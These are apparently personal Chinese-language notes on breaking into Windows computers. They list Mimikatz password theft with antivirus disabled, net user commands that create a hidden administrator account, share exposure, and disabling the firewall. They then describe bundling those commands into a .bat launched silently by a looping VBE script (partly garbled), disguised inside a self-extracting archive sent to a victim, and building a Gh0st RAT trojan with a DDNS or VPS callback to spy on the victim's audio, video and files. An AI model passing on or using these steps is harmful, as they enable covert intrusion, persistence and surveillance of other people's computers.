Windows系统密码破解

Windows系统密码破解

• BIOS密码（拆机抠电池...)

• 关机状态下（PC）：

  • windows pe |大白菜|老毛桃

• 正在开机的电脑密码破解：

  • 控制台Windows日志记录所有的操作情况（清除Windows日志本身操作也被记录到日志里）

  • 无损的情况下知道Windows密码

    • mimikatez(猕猴桃)：自动读取Windows密码（攻击服务器之后使用猕猴桃获得系统密码以合法身份入侵系统）这是一个猕猴桃（先关闭电脑杀毒软件）

    • 几个cmd命令：net user(查看当前电脑用户) net user [用户名] [密码] /add（增加一个用户） net user [用户名] /del（删除用户）net user [用户名]$ [密码] /add(增加隐形用户)

    • 增加用户后提权：

    • net localgroup users administrators [用户名]

    • net localgroup users [用户名] /del删除user中的用户是此用户成为真正的管理员用户，提权成功！

    • CMD输入net share查看共享情况

      • 给系统开共享：net share [name]=[目标盘符，如C:]
      • net share [name] /del 删除共享
      • net view查看内网（局域网）开了共享的计算机名，用映射网络驱动器连接对方系统共享，将对方系统内容共享到自己系统（需要提权）

    • 使用Powershell关掉对方防火墙

    • 总结：

      • 新建一个文本文档将上述命令输入，更改文件名为.bat,对方打开此文件即可获得对方电脑权限。

      • 接下来需要隐藏.bat运行时的黑框：

      新建.vbe:
      set ws=greatobject("wscript.shell")
      do
      ws.run "C:
      ame.bat",0
      wscript.sleep  9000
      loop
      

      • 将vbe文件添加压缩包（高级自解压到C盘，将文件进行隐藏和”化妆“更改图标）|msi静默安装包

      • 很多合法软件都可以做feifa的事情

      基础知识

      • 学习进阶1

      • 学习powershell

      • msi静默安装

    远程管理程序|木马

    • this is a muma|Gh0st RAT Beta ,C++写的开源木马生成器（GayHub有源码）可以去做逆向工程免杀
      • 监听端口|上线主机（IP）|两个端口一致
      • 动态域名(DDNS)：花生壳（下载软件，注册送动态域名--》公网ip)|租一台公网VPS
      • 生成.exe（自己不要点|自己中自己的木马）
      • 别人点了之后就可以通过Gh0st远程控制对方计算机
        • 可以监听对方语音，视频，查看删除文件，访问网址，清除日志，下载更新，下载执行